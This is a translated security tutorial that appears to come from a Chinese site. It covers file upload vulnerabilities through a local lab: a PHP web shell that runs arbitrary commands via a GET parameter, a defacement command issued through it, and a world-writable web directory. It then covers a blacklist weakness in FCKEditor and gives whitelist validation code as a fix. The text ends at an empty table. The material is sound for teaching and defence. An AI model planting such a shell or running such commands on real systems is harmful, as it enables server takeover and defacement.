File upload vulnerability example analysis-vulnerability warning-the black bar safety net

ID MYHACK58:62201671915
Type myhack58
Reporter 佚名 (Anonymous)
Modified 2016-02-22T00:00:00



File upload is a function that appears in many Web applications: it lets a user upload a file to the server, which saves it to a specific location. It is a very security-sensitive function, because once a malicious program is uploaded to the server and gains execute permission the consequences are dire, so the vast majority of Web applications place many restrictions on the upload feature. A file upload vulnerability is a flaw that lets an attacker bypass the system's validation and processing policy for files, upload a malicious program to the server, and gain the ability to execute server-side commands. The attack is direct and effective, and against some vulnerable systems there is practically no barrier at all.

The common ways a file upload vulnerability is used are:

  1. Upload a Web script, which the Web container then interprets and executes as a malicious script.
  2. Upload a Flash cross-domain policy file, crossdomain.xml, to modify access permissions (other policy files are used in a similar way).
  3. Upload viruses or trojan files, and trick users and administrators into downloading and running them.
  4. Upload a picture that contains a script; some older browser versions will execute the script, which is used for phishing and fraud.

In general, the uploaded file is either executable (a malicious program) or able to affect the server's behaviour (a configuration file). For the upload to be usable for an attack, the following conditions must be met:

  1. The file passes the front-end and back-end filtering and file processing: its contents are not changed and it is stored intact.
  2. The storage location is within the Web container's control.
  3. The attacker is able to access the storage directory.

The experiment demonstrates one exploitation method and includes the following material: the regist folder (the vulnerable web application), hacker.php (the malicious script to upload), and hacked.html (the defacement page that will replace the home page).

Use the following commands to download the experimental material to any directory on the virtual machine and unpack it:

wget <>
tar -xzf stuffs.tar.gz
cd stuffs

  1. Deploy the web application

Copy the regist folder to the /var/www/html/ directory:

sudo cp -R regist /var/www/html/

The directory structure of the regist folder is as follows:

index.html (front-end registration page)
regist.php (back-end registration handler)
upload/ (file upload directory)
css/ (style sheet directory)
fonts/ (font file directory)
js/ (script file directory)

Modify the directory permissions:

sudo chmod -R 777 /var/www/html/regist

Start the Apache2 service:

sudo service apache2 start


  2. Upload a malicious script program


This is an ordinary new-user registration page; fill in the registration information as you like. Note that although the page checks the text fields the user enters quite carefully, it does not strictly check the type of the uploaded avatar, which is very dangerous behaviour. For the avatar, choose the prepared malicious PHP program hacker.php, confirm, and click register. (Upload hacked.html in the same way.)

  3. Access the script program

From the directory structure we know that uploaded files are stored in the upload/ directory. To reach the uploaded PHP file, enter http://localhost/regist/upload/hacker.php in the browser address bar.

The source code of hacker.php is as follows:

<body><p>cmd:<?php echo $_GET['cmd']; ?></p><p>result:<br><?php system($_GET['cmd']); ?></p></body>

In fact you can write whatever code you like in the script file, as long as it is configured properly and can be executed smoothly.

The core of the code is system($_GET['cmd']);, which calls the PHP function system to execute a Linux system command taken from the cmd parameter of a GET request. This means we can execute arbitrary Linux commands with the privileges of the current user, just as if operating the local machine. First test that the malicious program runs correctly:



It runs successfully, which also means that the back-end module responsible for the upload function does no effective filtering or processing of uploaded files. Next, we use the uploaded hacked.html page to replace the home page:

http://localhost/regist/upload/hacker.php?cmd=mv hacked.html ../index.html

Access the Web application at localhost/regist again and refresh the page: the replacement has succeeded and the page displays "You Are Hacked".

Note that this requires hacked.html to have been uploaded to the upload/ directory.


Thinking and extension

  1. Type checking

In the experiment, the website's front end does no effective filtering or processing of file uploads. A similar, well-known case is the FCKEditor file upload vulnerability. FCKEditor is a very popular rich text editor, and its PHP version had a file upload type-check vulnerability; the relevant code is as follows:

$Config['AllowedExtensions']['File'] = array(); // allowed upload types
$Config['DeniedExtensions']['File'] = array('php', 'php3', 'php5', 'phtml', 'asp', 'aspx', 'ascx', 'jsp', 'cfm', 'cfc', 'pl', 'pl', 'bat', 'exe', 'dll', 'reg', 'cgi'); // disallowed upload types

As you can see, the code does check the file type, but it uses a blacklist approach, so a type name such as php2 or inc that is not on the list passes the type check. In addition, front-end validation can normally be bypassed by modifying or forging the POST packet.
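As an added example (not code from the original article or from FCKEditor), the following PHP places a blacklist check of the kind shown above beside a whitelist-based validator of the kind the regist.php avatar upload should use: it accepts only image extensions, verifies the real content type instead of the client-supplied one, renames the file, and stores it outside the web root so the stored file is not reachable through http://localhost/regist/upload/ at all. The function names, the allowed-type list, the size limit, the form field name avatar and the path /var/uploads/avatars are assumptions.

```php
<?php
// Added example, not the article's or FCKEditor's code: a blacklist
// extension check beside a whitelist validator for avatar uploads.
// Function names, ALLOWED_AVATAR_TYPES and the storage path are assumptions.

declare(strict_types=1);

// Blacklist: rejects only the extensions it lists. Any name it does not
// list (php2, inc, ...) passes, which is the weakness described above.
function blacklist_allows(string $filename): bool
{
    $denied = ['php', 'php3', 'php5', 'phtml', 'asp', 'aspx', 'jsp', 'pl', 'cgi', 'exe'];
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return !in_array($ext, $denied, true);
}

// Whitelist: only the image types an avatar can legitimately be, each
// paired with the MIME type its content must actually have.
const ALLOWED_AVATAR_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];
const MAX_AVATAR_BYTES = 512 * 1024; // assumed limit

/**
 * Validate one entry of $_FILES. Returns the extension to store the file
 * under, or null if the upload must be rejected.
 */
function validate_avatar(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if ($file['size'] > MAX_AVATAR_BYTES) {
        return null;
    }
    // Only the final extension is considered, and it must be whitelisted;
    // a name such as "x.php.jpg" is judged by "jpg" here and by its bytes below.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_AVATAR_TYPES[$ext])) {
        return null;
    }
    // $file['type'] is sent by the client and cannot be trusted;
    // sniff the uploaded bytes instead.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED_AVATAR_TYPES[$ext]) {
        return null;
    }
    // getimagesize() fails for files that are not real images.
    if (@getimagesize($file['tmp_name']) === false) {
        return null;
    }
    return $ext;
}

/**
 * Store an accepted upload under a random name in a directory outside the
 * web root, so nothing in it can be requested or executed through Apache.
 * Returns the stored path, or null if the file was rejected.
 */
function store_avatar(array $file, string $storageDir = '/var/uploads/avatars'): ?string
{
    $ext = validate_avatar($file);
    if ($ext === null) {
        return null;
    }
    // The client-supplied name is never used on disk: no path traversal
    // and no attacker-chosen extension.
    $dest = $storageDir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    // move_uploaded_file() refuses anything not uploaded in this request.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644); // readable, never executable
    return $dest;
}

// Usage inside regist.php (form field name "avatar" is assumed):
// $stored = store_avatar($_FILES['avatar'] ?? []);
// if ($stored === null) { http_response_code(400); exit('avatar rejected'); }
```

With this structure the experiment's two conditions for exploitation no longer hold: the stored file is not in the Web container's control range, and its name and extension are chosen by the server rather than the uploader. Serving accepted avatars then goes through a separate read-only handler (or a directory with script execution disabled) rather than a direct URL into the upload directory.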

  2. Permission requirements

To achieve the attack effect, the experimental procedure simplified some of the complex details. Some key steps depend on operating permissions. The permissions required by each step are given in the following table:

Step | Required permission
